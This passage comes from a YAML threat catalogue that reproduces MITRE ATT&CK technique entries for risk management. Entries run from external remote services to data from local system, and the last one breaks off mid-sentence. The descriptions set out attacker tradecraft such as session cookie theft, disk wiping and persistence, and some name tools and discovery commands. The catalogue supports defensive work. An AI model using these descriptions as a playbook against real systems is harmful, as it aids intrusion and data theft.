Management](https://attack.mitre.org/techniques/T1021/006)\ + \ and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used\ + \ externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to\ + \ [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service\ + \ is often a requirement, which could be obtained through credential pharming\ + \ or by obtaining the credentials from users after compromising the enterprise\ + \ network.(Citation: Volexity Virtual Private Keylogging) Access to remote services\ + \ may be used as a redundant or persistent access mechanism during an operation.\n\ + \nAccess may also be gained through an exposed service that doesn\u2019t require\ + \ authentication. In containerized environments, this may include an exposed\ + \ Docker API, Kubernetes API server, kubelet, or web application such as the\ + \ Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation:\ + \ Unit 42 Hildegard Malware)\nhttps://attack.mitre.org/techniques/T1133" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1539 + name: T1539 - Steal Web Session Cookie + provider: MITRE ATT&CK + description: 'An adversary may steal web application or service session cookies + and use them to gain access to web applications or Internet services as an authenticated + user without needing credentials. Web applications and services often use session + cookies as an authentication token after a user has authenticated to a website. + + + Cookies are often valid for an extended period of time, even if the web application + is not actively used. Cookies can be found on disk, in the process memory of + the browser, and in network traffic to remote systems. Additionally, other applications + on the targets machine might store sensitive authentication cookies in memory + (e.g. apps which authenticate to cloud services). Session cookies can be used + to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) + + + There are several examples of malware targeting cookies from web browsers on + the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 + Mac Crypto Cookies January 2019) There are also open source frameworks such + as `Evilginx2` and `Muraena` that can gather session cookies through a malicious + proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) + that can be set up by an adversary and used in phishing campaigns.(Citation: + Github evilginx2)(Citation: GitHub Mauraena) + + + After an adversary acquires a valid cookie, they can then perform a [Web Session + Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to + the corresponding web application. + + https://attack.mitre.org/techniques/T1539' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1578 + name: T1578 - Modify Cloud Compute Infrastructure + provider: MITRE ATT&CK + description: 'An adversary may attempt to modify a cloud account''s compute service + infrastructure to evade defenses. A modification to the compute service infrastructure + can include the creation, deletion, or modification of one or more components + such as compute instances, virtual machines, and snapshots. + + + Permissions gained from the modification of infrastructure components may bypass + restrictions that prevent access to existing infrastructure. Modifying infrastructure + components may also allow an adversary to evade detection and remove evidence + of their presence.(Citation: Mandiant M-Trends 2020) + + https://attack.mitre.org/techniques/T1578' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1069 + name: T1069 - Permission Groups Discovery + provider: MITRE ATT&CK + description: 'Adversaries may attempt to discover group and permission settings. + This information can help adversaries determine which user accounts and groups + are available, the membership of users in particular groups, and which users + and groups have elevated permissions. + + + Adversaries may attempt to discover group permission settings in many different + ways. This data may provide the adversary with information about the compromised + environment that can be used in follow-on activity and targeting.(Citation: + CrowdStrike BloodHound April 2018) + + https://attack.mitre.org/techniques/T1069' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1114 + name: T1114 - Email Collection + provider: MITRE ATT&CK + description: 'Adversaries may target user email to collect sensitive information. + Emails may contain sensitive data, including trade secrets or personal information, + that can prove valuable to adversaries. Adversaries can collect or forward email + from mail servers or clients. + + https://attack.mitre.org/techniques/T1114' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1594 + name: T1594 - Search Victim-Owned Websites + provider: MITRE ATT&CK + description: 'Adversaries may search websites owned by the victim for information + that can be used during targeting. Victim-owned websites may contain a variety + of details, including names of departments/divisions, physical locations, and + data about key employees such as names, roles, and contact info (ex: [Email + Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may + also have details highlighting business operations and relationships.(Citation: + Comparitech Leak) + + + Adversaries may search victim-owned websites to gather actionable information. + Information from these sources may reveal opportunities for other forms of reconnaissance + (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or + [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), + establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) + or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or + initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) + or [Phishing](https://attack.mitre.org/techniques/T1566)). + + https://attack.mitre.org/techniques/T1594' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1561 + name: T1561 - Disk Wipe + provider: MITRE ATT&CK + description: 'Adversaries may wipe or corrupt raw disk data on specific systems + or in large numbers in a network to interrupt availability to system and network + resources. With direct write access to a disk, adversaries may attempt to overwrite + portions of disk data. Adversaries may opt to wipe arbitrary portions of disk + data and/or wipe disk structures like the master boot record (MBR). A complete + wipe of all disk sectors may be attempted. + + + To maximize impact on the target organization in operations where network-wide + availability interruption is the goal, malware used for wiping disks may have + worm-like features to propagate across a network by leveraging additional techniques + like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential + Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin + Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster + Destructive Malware) + + + On network devices, adversaries may wipe configuration files and other data + from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) + commands such as `erase`.(Citation: erase_cmd_cisco) + + https://attack.mitre.org/techniques/T1561' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1615 + name: T1615 - Group Policy Discovery + provider: MITRE ATT&CK + description: 'Adversaries may gather information on Group Policy settings to identify + paths for privilege escalation, security measures applied within a domain, and + to discover patterns in domain objects that can be manipulated or used to blend + in the environment. Group Policy allows for centralized management of user and + computer settings in Active Directory (AD). Group policy objects (GPOs) are + containers for group policy settings made up of files stored within a predictable + network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group + Policy Basics)(Citation: ADSecurity GPO Persistence 2016) + + + Adversaries may use commands such as gpresult or various publicly + available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, + to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: + Github PowerShell Empire) Adversaries may use this information to shape follow-on + behaviors, including determining potential attack paths within the target network + as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy + Modification](https://attack.mitre.org/techniques/T1484)) for their benefit. + + https://attack.mitre.org/techniques/T1615' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1025 + name: T1025 - Data from Removable Media + provider: MITRE ATT&CK + description: "Adversaries may search connected removable media on computers they\ + \ have compromised to find files of interest. Sensitive data can be collected\ + \ from any removable media (optical disk drive, USB memory, etc.) connected\ + \ to the compromised system prior to Exfiltration. Interactive command shells\ + \ may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)\ + \ may be used to gather information. \n\nSome adversaries may also use [Automated\ + \ Collection](https://attack.mitre.org/techniques/T1119) on removable media.\n\ + https://attack.mitre.org/techniques/T1025" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1547 + name: T1547 - Boot or Logon Autostart Execution + provider: MITRE ATT&CK + description: 'Adversaries may configure system settings to automatically execute + a program during system boot or logon to maintain persistence or gain higher-level + privileges on compromised systems. Operating systems may have mechanisms for + automatically running a program on system boot or account logon.(Citation: Microsoft + Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: + Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These + mechanisms may include automatically executing programs that are placed in specially + designated directories or are referenced by repositories that store configuration + information, such as the Windows Registry. An adversary may achieve the same + goal by modifying or extending features of the kernel. + + + Since some boot or logon autostart programs run with higher privileges, an adversary + may leverage these to elevate privileges. + + https://attack.mitre.org/techniques/T1547' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1600 + name: T1600 - Weaken Encryption + provider: MITRE ATT&CK + description: "Adversaries may compromise a network device\u2019s encryption capability\ + \ in order to bypass encryption that would otherwise protect data communications.\ + \ (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect\ + \ transmitted network traffic to maintain its confidentiality (protect against\ + \ unauthorized disclosure) and integrity (protect against unauthorized changes).\ + \ Encryption ciphers are used to convert a plaintext message to ciphertext and\ + \ can be computationally intensive to decipher without the associated decryption\ + \ key. Typically, longer keys increase the cost of cryptanalysis, or decryption\ + \ without the key.\n\nAdversaries can compromise and manipulate devices that\ + \ perform encryption of network traffic. For example, through behaviors such\ + \ as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce\ + \ Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto\ + \ Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can\ + \ negatively effect and/or eliminate a device\u2019s ability to securely encrypt\ + \ network traffic. This poses a greater risk of unauthorized disclosure and\ + \ may help facilitate data manipulation, Credential Access, or Collection efforts.\ + \ (Citation: Cisco Blog Legacy Device Attacks)\nhttps://attack.mitre.org/techniques/T1600" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1489 + name: T1489 - Service Stop + provider: MITRE ATT&CK + description: "Adversaries may stop or disable services on a system to render those\ + \ services unavailable to legitimate users. Stopping critical services or processes\ + \ can inhibit or stop response to an incident or aid in the adversary's overall\ + \ objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer\ + \ 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by\ + \ disabling individual services of high importance to an organization, such\ + \ as MSExchangeIS, which will make Exchange content inaccessible\ + \ (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable\ + \ many or all services to render systems unusable.(Citation: Talos Olympic Destroyer\ + \ 2018) Services or processes may not allow for modification of their data stores\ + \ while running. Adversaries may stop services or processes in order to conduct\ + \ [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted\ + \ for Impact](https://attack.mitre.org/techniques/T1486) on the data stores\ + \ of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)\n\ + https://attack.mitre.org/techniques/T1489" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1652 + name: T1652 - Device Driver Discovery + provider: MITRE ATT&CK + description: 'Adversaries may attempt to enumerate local device drivers on a victim + host. Information about device drivers may highlight various insights that shape + follow-on behaviors, such as the function/purpose of the host, present security + tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) + or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), + as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege + Escalation](https://attack.mitre.org/techniques/T1068)). + + + Many OS utilities may provide information about local device drivers, such as + `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: + Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about + device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) + may also be available in the Registry.(Citation: Microsoft Registry Drivers) + + + On Linux/macOS, device drivers (in the form of kernel modules) may be visible + within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux + Kernel Programming)(Citation: lsmod man)(Citation: modinfo man) + + https://attack.mitre.org/techniques/T1652' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1564 + name: T1564 - Hide Artifacts + provider: MITRE ATT&CK + description: 'Adversaries may attempt to hide artifacts associated with their + behaviors to evade detection. Operating systems may have features to hide various + artifacts, such as important system files and administrative task execution, + to avoid disrupting user work environments and prevent users from changing files + or features on the system. Adversaries may abuse these features to hide artifacts + such as files, directories, user accounts, or other system activity to evade + detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: + MalwareBytes ADS July 2015) + + + Adversaries may also attempt to hide artifacts associated with malicious behavior + by creating computing regions that are isolated from common security instrumentation, + such as through the use of virtualization technology.(Citation: Sophos Ragnar + May 2020) + + https://attack.mitre.org/techniques/T1564' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1080 + name: T1080 - Taint Shared Content + provider: MITRE ATT&CK + description: 'Adversaries may deliver payloads to remote systems by adding content + to shared storage locations, such as network drives or internal code repositories. + Content stored on network drives or in other shared locations may be tainted + by adding malicious programs, scripts, or exploit code to otherwise valid files. + Once a user opens the shared tainted content, the malicious portion can be executed + to run the adversary''s code on a remote system. Adversaries may use tainted + shared content to move laterally. + + + A directory share pivot is a variation on this technique that uses several other + techniques to propagate malware when users access a shared network directory. + It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) + of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) + to look like the real directories, which are hidden through [Hidden Files and + Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based + directories have an embedded command that executes the hidden malware file in + the directory and then opens the real intended directory so that the user''s + expected action still occurs. When used with frequently used network directories, + the technique may result in frequent reinfections and broad access to systems + and potentially to new and higher privileged accounts. (Citation: Retwin Directory + Share Pivot) + + + Adversaries may also compromise shared network directories through binary infections + by appending or prepending its code to the healthy binary on the shared network + directory. The malware may modify the original entry point (OEP) of the healthy + binary to ensure that it is executed before the legitimate code. The infection + could continue to spread via the newly infected file when it is executed by + a remote system. These infections may target both binary and non-binary formats + that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, + and/or .VBS. + + https://attack.mitre.org/techniques/T1080' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1137 + name: T1137 - Office Application Startup + provider: MITRE ATT&CK + description: 'Adversaries may leverage Microsoft Office-based applications for + persistence between startups. Microsoft Office is a fairly common application + suite on Windows-based operating systems within an enterprise network. There + are multiple mechanisms that can be used with Office for persistence when an + Office-based application is started; this can include the use of Office Template + Macros and add-ins. + + + A variety of features have been discovered in Outlook that can be abused to + obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost + Ruler GitHub) These persistence mechanisms can work within Outlook or be used + through Office 365.(Citation: TechNet O365 Outlook Rules) + + https://attack.mitre.org/techniques/T1137' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1119 + name: T1119 - Automated Collection + provider: MITRE ATT&CK + description: "Once established within a system or network, an adversary may use\ + \ automated techniques for collecting internal data. Methods for performing\ + \ this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)\ + \ to search for and copy information fitting set criteria such as file type,\ + \ location, or name at specific time intervals. In cloud-based environments,\ + \ adversaries may also use cloud APIs, command line interfaces, or extract,\ + \ transform, and load (ETL) services to automatically collect data. This functionality\ + \ could also be built into remote access tools. \n\nThis technique may incorporate\ + \ use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)\ + \ and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to\ + \ identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538)\ + \ and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619)\ + \ to identify resources in cloud environments.\nhttps://attack.mitre.org/techniques/T1119" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1115 + name: T1115 - Clipboard Data + provider: MITRE ATT&CK + description: "Adversaries may collect data stored in the clipboard from users\ + \ copying information within or between applications. \n\nFor example, on Windows\ + \ adversaries can access clipboard data by using clip.exe or Get-Clipboard.(Citation:\ + \ MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally,\ + \ adversaries may monitor then replace users\u2019 clipboard with their data\ + \ (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation:\ + \ mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as\ + \ pbpaste, to grab clipboard contents.(Citation: Operating with\ + \ EmPyre)\nhttps://attack.mitre.org/techniques/T1115" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1007 + name: T1007 - System Service Discovery + provider: MITRE ATT&CK + description: 'Adversaries may try to gather information about registered local + system services. Adversaries may obtain information about services using tools + as well as OS utility commands such as sc query, tasklist + /svc, systemctl --type=service, and net start. + + + Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) + during automated discovery to shape follow-on behaviors, including whether or + not the adversary fully infects the target and/or attempts specific actions. + + https://attack.mitre.org/techniques/T1007' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1040 + name: T1040 - Network Sniffing + provider: MITRE ATT&CK + description: 'Adversaries may sniff network traffic to capture information about + an environment, including authentication material passed over the network. Network + sniffing refers to using the network interface on a system to monitor or capture + information sent over a wired or wireless connection. An adversary may place + a network interface into promiscuous mode to passively access data in transit + over the network, or use span ports to capture a larger amount of data. + + + Data captured via this technique may include user credentials, especially those + sent over an insecure, unencrypted protocol. Techniques for name service resolution + poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), + can also be used to capture credentials to websites, proxies, and internal systems + by redirecting traffic to an adversary. + + + Network sniffing may also reveal configuration details, such as running services, + version numbers, and other network characteristics (e.g. IP addresses, hostnames, + VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. + + + In cloud-based environments, adversaries may still be able to use traffic mirroring + services to sniff network traffic from virtual machines. For example, AWS Traffic + Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified + instances to collect traffic from and specified targets to send collected traffic + to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: + Azure Virtual Network TAP) Often, much of this traffic will be in cleartext + due to the use of TLS termination at the load balancer level to reduce the strain + of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC + Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary + can then use exfiltration techniques such as Transfer Data to Cloud Account + in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC + Traffic Mirroring) + + + On network devices, adversaries may perform network captures using [Network + Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as + `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software) + + https://attack.mitre.org/techniques/T1040' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1530 + name: T1530 - Data from Cloud Storage + provider: MITRE ATT&CK + description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers\ + \ offer solutions for online data object storage such as Amazon S3, Azure Storage,\ + \ and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office\ + \ 365 and Google Workspace provide cloud-based document storage to users through\ + \ services such as OneDrive and Google Drive, while SaaS application providers\ + \ such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage\ + \ solutions as a peripheral or primary use case of their platform. \n\nIn some\ + \ cases, as with IaaS-based cloud storage, there exists no overarching application\ + \ (such as SQL or Elasticsearch) with which to interact with the stored objects:\ + \ instead, data from these solutions is retrieved directly though the [Cloud\ + \ API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications,\ + \ adversaries may be able to collect this data directly from APIs or backend\ + \ cloud storage objects, rather than through their front-end application or\ + \ interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)).\ + \ \n\nAdversaries may collect sensitive data from these cloud storage solutions.\ + \ Providers typically offer security guides to help end users configure systems,\ + \ though misconfigurations are a common problem.(Citation: Amazon S3 Security,\ + \ 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud\ + \ Storage Best Practices, 2019) There have been numerous incidents where cloud\ + \ storage has been improperly secured, typically by unintentionally allowing\ + \ public access to unauthenticated users, overly-broad access by all users,\ + \ or even access for any anonymous person outside the control of the Identity\ + \ Access Management system without even needing basic user permissions.\n\n\ + This open access may expose various types of sensitive data, such as credit\ + \ cards, personally identifiable information, or medical records.(Citation:\ + \ Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation:\ + \ HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)\n\n\ + Adversaries may also obtain then abuse leaked credentials from source repositories,\ + \ logs, or other means as a way to gain access to cloud storage objects.\nhttps://attack.mitre.org/techniques/T1530" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1135 + name: T1135 - Network Share Discovery + provider: MITRE ATT&CK + description: "Adversaries may look for folders and drives shared on remote systems\ + \ as a means of identifying sources of information to gather as a precursor\ + \ for Collection and to identify potential systems of interest for Lateral Movement.\ + \ Networks often contain shared network drives and folders that enable users\ + \ to access file directories on various systems across a network. \n\nFile sharing\ + \ over a Windows network occurs over the SMB protocol. (Citation: Wikipedia\ + \ Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039)\ + \ can be used to query a remote system for available shared drives using the\ + \ net view \\\\\\\\remotesystem command. It can also be used to\ + \ query shared drives on the local system using net share. For\ + \ macOS, the sharing -l command lists all shared points used for\ + \ smb services.\nhttps://attack.mitre.org/techniques/T1135" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1120 + name: T1120 - Peripheral Device Discovery + provider: MITRE ATT&CK + description: 'Adversaries may attempt to gather information about attached peripheral + devices and components connected to a computer system.(Citation: Peripheral + Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could + include auxiliary resources that support a variety of functionalities such as + keyboards, printers, cameras, smart card readers, or removable storage. The + information may be used to enhance their awareness of the system and network + environment or may be used for further actions. + + https://attack.mitre.org/techniques/T1120' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1082 + name: T1082 - System Information Discovery + provider: MITRE ATT&CK + description: 'An adversary may attempt to get detailed information about the operating + system and hardware, including version, patches, hotfixes, service packs, and + architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) + during automated discovery to shape follow-on behaviors, including whether or + not the adversary fully infects the target and/or attempts specific actions. + + + Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used + to gather detailed system information. If running with privileged access, a + breakdown of system data can be gathered through the systemsetup + configuration tool on macOS. As an example, adversaries with user-level access + can execute the df -aH command to obtain currently mounted disks + and associated freely available space. Adversaries may also leverage a [Network + Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices + to gather detailed system information (e.g. show version).(Citation: + US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) + combined with information gathered from other forms of discovery and reconnaissance + can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: + 20 macOS Common Tools and Techniques) + + + Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure + allow access to instance and virtual machine information via APIs. Successful + authenticated API calls can return data such as the operating system platform + and status of a particular instance or the model view of a virtual machine.(Citation: + Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft + Virutal Machine API) + + https://attack.mitre.org/techniques/T1082' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1071 + name: T1071 - Application Layer Protocol + provider: MITRE ATT&CK + description: "Adversaries may communicate using OSI application layer protocols\ + \ to avoid detection/network filtering by blending in with existing traffic.\ + \ Commands to the remote system, and often the results of those commands, will\ + \ be embedded within the protocol traffic between the client and server. \n\n\ + Adversaries may utilize many different protocols, including those used for web\ + \ browsing, transferring files, electronic mail, or DNS. For connections that\ + \ occur internally within an enclave (such as those between a proxy or pivot\ + \ node and other nodes), commonly used protocols are SMB, SSH, or RDP.\nhttps://attack.mitre.org/techniques/T1071" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1053 + name: T1053 - Scheduled Task/Job + provider: MITRE ATT&CK + description: 'Adversaries may abuse task scheduling functionality to facilitate + initial or recurring execution of malicious code. Utilities exist within all + major operating systems to schedule programs or scripts to be executed at a + specified date and time. A task can also be scheduled on a remote system, provided + the proper authentication is met (ex: RPC and file and printer sharing in Windows + environments). Scheduling a task on a remote system typically may require being + a member of an admin or otherwise privileged group on the remote system.(Citation: + TechNet Task Scheduler Security) + + + Adversaries may use task scheduling to execute programs at system startup or + on a scheduled basis for persistence. These mechanisms can also be abused to + run a process under the context of a specified account (such as one with elevated + permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), + adversaries have also abused task scheduling to potentially mask one-time execution + under a trusted system process.(Citation: ProofPoint Serpent) + + https://attack.mitre.org/techniques/T1053' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1176 + name: T1176 - Browser Extensions + provider: MITRE ATT&CK + description: 'Adversaries may abuse Internet browser extensions to establish persistent + access to victim systems. Browser extensions or plugins are small programs that + can add functionality and customize aspects of Internet browsers. They can be + installed directly or through a browser''s app store and generally have access + and permissions to everything that the browser can access.(Citation: Wikipedia + Browser Extension)(Citation: Chrome Extensions Definition) + + + Malicious extensions can be installed into a browser through malicious app store + downloads masquerading as legitimate extensions, through social engineering, + or by an adversary that has already compromised a system. Security can be limited + on browser app stores so it may not be difficult for malicious extensions to + defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending + on the browser, adversaries may also manipulate an extension''s update url to + install updates from an adversary controlled server or manipulate the mobile + configuration file to silently install additional extensions. + + + Previous to macOS 11, adversaries could silently install browser extensions + via the command line using the profiles tool to install malicious + .mobileconfig files. In macOS 11+, the use of the profiles + tool can no longer install configuration profiles, however .mobileconfig + files can be planted and installed with user interaction.(Citation: xorrior + chrome extensions macOS) + + + Once the extension is installed, it can browse to websites in the background, + steal all information that a user enters into a browser (including credentials), + and be used as an installer for a RAT for persistence.(Citation: Chrome Extension + Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome + Extension Steals Creds)(Citation: Catch All Chrome Extension) + + + There have also been instances of botnets using a persistent backdoor through + malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been + similar examples of extensions being used for command & control.(Citation: Chrome + Extension C2 Malware) + + https://attack.mitre.org/techniques/T1176' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1106 + name: T1106 - Native API + provider: MITRE ATT&CK + description: 'Adversaries may interact with the native OS application programming + interface (API) to execute behaviors. Native APIs provide a controlled means + of calling low-level OS services within the kernel, such as those involving + hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: + Linux Kernel API) These native APIs are leveraged by the OS during system boot + (when other system components are not yet initialized) as well as carrying out + tasks and requests during routine operations. + + + Adversaries may abuse these OS API functions as a means of executing behaviors. + Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), + the native API and its hierarchy of interfaces provide mechanisms to interact + with and utilize various components of a victimized system. + + + Native API functions (such as NtCreateProcess) may be directed + invoked via system calls / syscalls, but these features are also often exposed + to user-mode applications via interfaces and libraries.(Citation: OutFlank System + Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, + functions such as the Windows API CreateProcess() or GNU fork() + will allow programs and scripts to start other processes.(Citation: Microsoft + CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, + run a CLI command, load modules, etc. as thousands of similar API functions + exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: + GLIBC) + + + Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are + also available to interact with native APIs. These frameworks typically provide + language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability + of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS + Cocoa)(Citation: macOS Foundation) + + + Adversaries may use assembly to directly or in-directly invoke syscalls in an + attempt to subvert defensive sensors and detection signatures such as user mode + API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper + with sensors and defensive tools associated with API monitoring, such as unhooking + monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001). + + https://attack.mitre.org/techniques/T1106' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1202 + name: T1202 - Indirect Command Execution + provider: MITRE ATT&CK + description: 'Adversaries may abuse utilities that allow for command execution + to bypass security restrictions that limit the use of command-line interpreters. + Various Windows utilities may be used to execute commands, possibly without + invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), + the Program Compatibility Assistant (pcalua.exe), components of the Windows + Subsystem for Linux (WSL), as well as other utilities may invoke the execution + of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), + Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: + Evi1cg Forfiles Nov 2017) + + + Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), + specifically to perform arbitrary execution while subverting detections and/or + mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) + or file extensions more commonly associated with malicious payloads. + + https://attack.mitre.org/techniques/T1202' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1091 + name: T1091 - Replication Through Removable Media + provider: MITRE ATT&CK + description: 'Adversaries may move onto systems, possibly those on disconnected + or air-gapped networks, by copying malware to removable media and taking advantage + of Autorun features when the media is inserted into a system and executes. In + the case of Lateral Movement, this may occur through modification of executable + files stored on removable media or by copying malware and renaming it to look + like a legitimate file to trick users into executing it on a separate system. + In the case of Initial Access, this may occur through manual manipulation of + the media, modification of systems used to initially format the media, or modification + to the media''s firmware itself. + + + Mobile devices may also be used to infect PCs with malware if connected via + USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using + devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: + Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For + example, when a smartphone is connected to a system, it may appear to be mounted + similar to a USB-connected disk drive. If malware that is compatible with the + connected system is on the mobile device, the malware could infect the machine + (especially if Autorun features are enabled). + + https://attack.mitre.org/techniques/T1091' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1005 + name: T1005 - Data from Local System + provider: MITRE ATT&CK + description: 'Adversaries may search local system sources, such as file systems 